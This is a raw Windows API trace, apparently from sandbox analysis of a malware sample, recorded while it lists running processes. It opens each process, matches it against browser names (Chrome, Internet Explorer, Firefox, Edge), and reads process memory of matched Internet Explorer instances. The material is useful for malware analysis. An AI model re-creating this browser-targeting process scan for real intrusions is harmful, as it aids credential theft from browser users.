	[0208.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.307] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0208.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.307] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0208.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3208
	[0208.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.328] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0208.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.328] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.329] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0208.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.329] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.329] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0208.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0208.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0208.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x320c
	[0208.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.331] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0208.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.331] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.332] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0208.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.332] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0208.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3210
	[0208.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.334] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0208.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.334] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.334] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0208.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.334] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0208.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3214
	[0208.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.335] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0208.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.336] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.336] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0208.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.336] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.337] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0208.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3218
	[0208.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.337] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0208.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.338] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.338] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0208.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.339] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.339] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0208.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x321c
	[0208.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.340] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0208.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.340] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.341] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0208.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.341] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0208.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3220
	[0208.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.343] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0208.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.343] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.343] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0208.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.343] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0208.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3224
	[0208.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.344] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0208.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.345] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.345] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0208.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.346] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0208.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3228
	[0208.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.347] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0208.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.347] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.348] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0208.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.348] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0208.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x322c
	[0208.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.349] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0208.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.350] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.350] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0208.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.350] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0208.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3230
	[0208.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.351] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0208.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.351] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.352] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0208.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.352] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0208.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3234
	[0208.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.353] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0208.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.353] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.354] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0208.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.429] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.431] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0208.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3238
	[0208.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.591] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0208.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.591] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.592] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0208.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.593] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.593] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0208.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x323c
	[0208.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.594] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0208.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.594] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.595] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0208.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.595] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0208.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3240
	[0208.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.596] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0208.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.597] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.597] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0208.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.598] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.599] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0208.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3244
	[0208.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.599] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0208.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.600] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.600] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0208.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.601] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.601] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0208.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3248
	[0208.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.602] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0208.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.602] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0208.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.602] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0208.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.603] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.603] NtQueryInformationProcess (in: ProcessHandle=0x3248, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0208.603] ReadProcessMemory (in: hProcess=0x3248, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0208.603] ReadProcessMemory (in: hProcess=0x3248, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0208.603] ReadProcessMemory (in: hProcess=0x3248, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0208.603] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0208.603] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0208.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x324c
	[0208.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.605] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0208.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.605] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0208.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.605] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0208.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.605] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.606] NtQueryInformationProcess (in: ProcessHandle=0x324c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0208.606] ReadProcessMemory (in: hProcess=0x324c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0208.606] ReadProcessMemory (in: hProcess=0x324c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0208.606] ReadProcessMemory (in: hProcess=0x324c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0208.606] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0208.606] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0208.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3250
	[0208.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.607] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0208.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.607] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.607] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0208.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.608] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.608] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0208.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3254
	[0208.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.609] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0208.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.609] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.609] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0208.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.610] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.610] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3258
	[0208.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.611] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.611] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.611] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.612] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.612] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.612] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x325c
	[0208.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.613] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.614] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.614] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
